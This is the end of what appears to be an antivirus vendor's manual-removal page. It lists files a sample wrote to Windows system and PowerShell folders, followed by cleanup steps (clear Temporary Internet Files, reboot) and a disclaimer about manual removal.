    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
    %System%\SET2D.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
    %System%\SET25.tmp (1281 bytes)
    %System%\SET13.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
    %System%\SET20.tmp (2 bytes)
    %System%\SET14.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
    %WinDir%\inf\SET32.tmp (38 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
    %System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
    %System%\SET2A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
    %System%\SET7.tmp (35 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
    %System%\SET22.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
    %System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
    %System%\SET2B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
    %WinDir%\inf\SET18.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
    %System%\SETE.tmp (22 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (7641 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
    %System%\SET6.tmp (2 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\wbem\SET4.tmp (4 bytes)
    %System%\SET17.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
    %System%\config\SYSTEM.LOG (8521 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
    %System%\SET27.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
    %System%\SET11.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
    %System%\SET8.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
    %System%\SETF.tmp (1281 bytes)
    %System%\SET10.tmp (2 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
    %System%\SET26.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
    %System%\SET21.tmp (35 bytes)
    %System%\config\system (4276 bytes)
    %System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
    %System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
    %System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
    %System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
    %System%\SET16.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
    %System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
    %System%\CatRoot2\dberr.txt (1499 bytes)
    %WinDir%\inf\oem11.PNF (13062 bytes)
    %System%\SETB.tmp (1281 bytes)
    %System%\SET1F.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
    %System%\spupdsvc.exe (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
    %System%\SET28.tmp (22 bytes)
    %System%\SET5.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
    %System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
    %System%\SET31.tmp (673 bytes)
    %System%\SET2E.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
    %System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
    %System%\SET29.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
    %System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
    %System%\SET2C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
    %WinDir%\KB968930.log (240837 bytes)
    %System%\SET15.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
    %System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
    %System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
    %System%\SET24.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
    %System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
    %System%\winrm\0409\SET1D.tmp (601 bytes)
    %System%\SETD.tmp (601 bytes)
    %WinDir%\inf\SET19.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
    %System%\SET9.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
    %System%\winrm\0409\SET37.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
    %System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
    %System%\SET2F.tmp (789 bytes)
    %WinDir%\Help\SETC5.tmp (12287 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
    %WinDir%\inf\oem11.inf (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
    %System%\SET30.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
    %System%\wbem\SET1E.tmp (4 bytes)
    %System%\SET23.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
    %WinDir%\inf\SET33.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
    %WinDir%\assembly\tmp\67EKQW17\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\84AFKPV0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\98EJOUZ4\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\79GLRX39\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\MJPU05AF\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\CELRW28E\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\ZW27CINS\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\GDJOTY49\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\URX27CHN\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\KLSX39FL\Microsoft.WSMan.Management.dll (9608 bytes)
    %WinDir%\assembly\tmp\QNTY38EJ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\14BHNTY4\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\KFLQV05B\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\95BHMRW1\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\ECHMSX27\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\517CINSX\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\Y4BHNTZ4\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\GEKPUZ5A\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\KKRW16BG\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\35CIOUZ5\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\NLRW16BH\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\ZV17CHMR\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\MKQV05AG\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (2260 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (172 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
